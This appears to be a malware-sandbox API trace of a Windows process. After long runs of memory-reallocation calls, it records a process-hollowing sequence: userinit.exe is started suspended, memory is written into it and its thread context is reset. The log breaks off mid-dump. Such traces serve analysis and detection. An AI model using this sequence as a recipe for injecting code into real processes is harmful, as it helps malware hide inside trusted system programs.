[0209.172] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0209.173] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0209.174] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0209.174] GlobalUnlock (hMem=0x95000c) returned 0
[0209.174] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0209.174] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0209.175] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0209.175] GlobalUnlock (hMem=0x95000c) returned 0
[0209.175] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0209.176] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0209.177] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0209.177] GlobalUnlock (hMem=0x95000c) returned 0
[0209.177] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0209.177] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.178] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.178] GlobalUnlock (hMem=0x95000c) returned 0
[0209.178] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0209.179] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.180] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.180] GlobalUnlock (hMem=0x95000c) returned 0
[0209.180] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0209.180] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.181] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.181] GlobalUnlock (hMem=0x95000c) returned 0
[0209.181] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0209.181] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.182] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.182] GlobalUnlock (hMem=0x95000c) returned 0
[0209.182] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0209.182] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.183] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.183] GlobalUnlock (hMem=0x95000c) returned 0
[0209.183] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0209.183] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.184] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.184] GlobalUnlock (hMem=0x95000c) returned 0
[0209.184] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0209.184] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.185] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.185] GlobalUnlock (hMem=0x95000c) returned 0
[0209.185] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0209.185] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.186] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.186] GlobalUnlock (hMem=0x95000c) returned 0
[0209.186] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0209.186] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.187] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.187] GlobalUnlock (hMem=0x95000c) returned 0
[0209.187] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0209.187] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.188] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.188] GlobalUnlock (hMem=0x95000c) returned 0
[0209.188] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0209.190] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0209.190] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0209.190] GlobalUnlock (hMem=0x95000c) returned 0
[0209.190] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0209.191] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0209.191] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0209.191] GlobalUnlock (hMem=0x95000c) returned 0
[0209.191] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0209.193] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0209.194] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0209.194] GlobalUnlock (hMem=0x95000c) returned 0
[0209.194] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0209.194] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.195] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.195] GlobalUnlock (hMem=0x95000c) returned 0
[0209.195] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0209.195] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.196] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.196] GlobalUnlock (hMem=0x95000c) returned 0
[0209.196] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0209.196] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.197] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.197] GlobalUnlock (hMem=0x95000c) returned 0
[0209.197] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0209.197] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.198] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.198] GlobalUnlock (hMem=0x95000c) returned 0
[0209.198] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0209.198] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.199] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.199] GlobalUnlock (hMem=0x95000c) returned 0
[0209.199] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0209.199] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.200] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.200] GlobalUnlock (hMem=0x95000c) returned 0
[0209.200] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0209.200] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.201] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.201] GlobalUnlock (hMem=0x95000c) returned 0
[0209.201] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0209.201] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.202] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.202] GlobalUnlock (hMem=0x95000c) returned 0
[0209.202] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0209.202] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.203] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.203] GlobalUnlock (hMem=0x95000c) returned 0
[0209.203] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0209.203] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.204] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.204] GlobalUnlock (hMem=0x95000c) returned 0
[0209.204] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0209.204] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.205] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.205] GlobalUnlock (hMem=0x95000c) returned 0
[0209.205] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0209.205] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.206] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.206] GlobalUnlock (hMem=0x95000c) returned 0
[0209.206] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0209.206] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.207] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.207] GlobalUnlock (hMem=0x95000c) returned 0
[0209.207] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0209.207] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.208] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.208] GlobalUnlock (hMem=0x95000c) returned 0
[0209.208] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0209.208] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.209] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.209] GlobalUnlock (hMem=0x95000c) returned 0
[0209.209] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0209.209] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.210] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.210] GlobalUnlock (hMem=0x95000c) returned 0
[0209.210] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0209.210] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.211] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.211] GlobalUnlock (hMem=0x95000c) returned 0
[0209.211] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0209.211] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.212] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.212] GlobalUnlock (hMem=0x95000c) returned 0
[0209.212] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0209.212] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.213] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.213] GlobalUnlock (hMem=0x95000c) returned 0
[0209.213] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0209.213] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.214] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.214] GlobalUnlock (hMem=0x95000c) returned 0
[0209.214] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0209.214] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.215] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.215] GlobalUnlock (hMem=0x95000c) returned 0
[0209.215] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0209.215] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.216] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.216] GlobalUnlock (hMem=0x95000c) returned 0
[0209.216] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0209.216] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.216] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.216] GlobalUnlock (hMem=0x95000c) returned 0
[0209.217] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0209.217] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.217] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.217] GlobalUnlock (hMem=0x95000c) returned 0
[0209.217] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0209.217] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.218] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.218] GlobalUnlock (hMem=0x95000c) returned 0
[0209.218] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0209.218] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.219] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.219] GlobalUnlock (hMem=0x95000c) returned 0
[0209.219] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0209.219] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.220] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0209.220] GlobalUnlock (hMem=0x95000c) returned 0
[0209.230] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0209.230] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0209.231] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x144, hThread=0x148, dwProcessId=0x998, dwThreadId=0x994)) returned 1
[0209.239] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0209.240] GetThreadContext (in: hThread=0x148, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd3000, Edx=0x0, Ecx=0x0, Eax=0xec2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1afc30, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0209.240] ReadProcessMemory (in: hProcess=0x144, lpBaseAddress=0x7ffd3008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0209.240] VirtualAllocEx (hProcess=0x144, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0209.240] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1c90000
[0209.241] VirtualAlloc (lpAddress=0x1c90000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c90000
[0209.241] VirtualAlloc (lpAddress=0x1c34000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c34000
[0209.247] WriteProcessMemory (in: hProcess=0x144, lpBaseAddress=0x400000, lpBuffer=0x1c32dfc*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1c32dfc*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0209.260] WriteProcessMemory (in: hProcess=0x144, lpBaseAddress=0x7ffd3008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0209.260] SetThreadContext (hThread=0x148, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd3000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1afc30, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, 